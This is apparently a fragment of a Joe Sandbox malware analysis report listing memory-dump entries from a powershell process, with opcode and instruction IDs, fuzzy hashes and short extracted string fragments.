                                                                • Instruction Fuzzy Hash: A541263160CA894FE749AB2CD8559B53BF1EF56364B0401FED489CB193DE1AA883C792
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 615d71ec4f6958bb078e6e72dafeb5bdf5251f093709daee85d787eb146120b5
                                                                • Instruction ID: 551f265747145a187d73540497e8ce9fbccbda13eb77124881a3766eb6c9d32f
                                                                • Opcode Fuzzy Hash: 615d71ec4f6958bb078e6e72dafeb5bdf5251f093709daee85d787eb146120b5
                                                                • Instruction Fuzzy Hash: CB421812D4DAC68FE7A58A78981917CBFF2FF62650B5801FFC088CB1DBE8189905D752
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637840905.00007FF887DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887dc0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 37effa1fadea78092fc915f56180ab4fc9f3128f5d035797821c277ecd4a9872
                                                                • Instruction ID: 5fc31a9271ba658ba4659d98c7bffe9ae1fea64c9ffb701a7854be1db3c0a819
                                                                • Opcode Fuzzy Hash: 37effa1fadea78092fc915f56180ab4fc9f3128f5d035797821c277ecd4a9872
                                                                • Instruction Fuzzy Hash: 55D16732D4DA8A4FEB55AB6848546BDBBF0FF453D4B0802FED00EC7293DA18A805D352
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20b9bf4bad2e871f65b95faca06597de1dc1f11236ce26bb528e4d6c5f2447a9
                                                                • Instruction ID: 4d14daa2304dacf1f24266d651333391a3bc60c8234e8cb50bb98c7c01079ff5
                                                                • Opcode Fuzzy Hash: 20b9bf4bad2e871f65b95faca06597de1dc1f11236ce26bb528e4d6c5f2447a9
                                                                • Instruction Fuzzy Hash: 02A1BD31A0CA8C4FEB95DB68D8657ECBBB1FF22350F1441BBC08DD7192DA685985CB42
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ad38df2a177dded6871bae6517247034a3f8e1d3c3118bbf641c9304168a4df
                                                                • Instruction ID: 83cf42b9d3bd936f9439f4d0a9c4683c07601758d236c4b3ea5978680d0609d6
                                                                • Opcode Fuzzy Hash: 2ad38df2a177dded6871bae6517247034a3f8e1d3c3118bbf641c9304168a4df
                                                                • Instruction Fuzzy Hash: 0991BC31A0CA8C8FEB95DB6898597ECBBB1FF66310F0441BBC08DD7193DA645986CB41
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: c9e914f1ce835b35214027747c8b5bae58525f0394af00b361ad7d0fed646684
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 2401677115CB0D4FD744EF0CE451AAAB7E0FB95364F10056EE58AC3651D736E882CB46
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5310e2622dfc37f4d47f96d2b38e307ab091e721b319df31d42f3422c2627b63
                                                                • Instruction ID: 84aca2be7ab2414437bd8e81e58abf24fb590a2e37720b974d1e6714722251a6
                                                                • Opcode Fuzzy Hash: 5310e2622dfc37f4d47f96d2b38e307ab091e721b319df31d42f3422c2627b63
                                                                • Instruction Fuzzy Hash: 6CC1A146D4E6C18FD34687789D5D278AFE2BF26290B1801FFC0948B1DBE98D8909D357
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (0_$8,_$H1_$P/_$]$p0_$-_$/_
                                                                • API String ID: 0-2624468954
                                                                • Opcode ID: 76d2f66015403b207efef863c4381402a4ce65b96ec8db9164dfe55f4664e6a1
                                                                • Instruction ID: d061bd472ecc94e5583278caf602abda3eaeac7decadbb3cc199d7b815c44804
                                                                • Opcode Fuzzy Hash: 76d2f66015403b207efef863c4381402a4ce65b96ec8db9164dfe55f4664e6a1
                                                                • Instruction Fuzzy Hash: 4F31F162E8EAC54FE31642786C18138AFF3BF46A9071840FFC05C474DBDA859895C356
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (0_$8,_$P/_$]$p0_$-_$/_
                                                                • API String ID: 0-1902751526
                                                                • Opcode ID: d7fcef81f6fc33dca70357fe80db6bd05b0415e5b32981bf5f6ce9854a92bccb
                                                                • Instruction ID: 4cec14e6766d33db277da9554f45bc6a4f46e93ac7837cb58e89d78975d975b7
                                                                • Opcode Fuzzy Hash: d7fcef81f6fc33dca70357fe80db6bd05b0415e5b32981bf5f6ce9854a92bccb
                                                                • Instruction Fuzzy Hash: 1F51C552D8E6C24FF3564278AC2513C6FB2BF13AA071C00FFC4A88B0D7DA895899C356
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.1637242218.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ff887cf0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @J_$I$]$p@s$x._
                                                                • API String ID: 0-17577835
                                                                • Opcode ID: 9477dd9b0996bfc42cc3c66f63a10504d3b6334e03709286e3779605d6d9cdcc
                                                                • Instruction ID: 2ecc6a273ec59c87a00e87925862e052de203856fbd21f6d54f1e31e1d7fb844
                                                                • Opcode Fuzzy Hash: 9477dd9b0996bfc42cc3c66f63a10504d3b6334e03709286e3779605d6d9cdcc
                                                                • Instruction Fuzzy Hash: 2F61C152D8EAC14FF31646A9781427D6FB2FF42E9079840FBC09C8B0DBE8859D99D316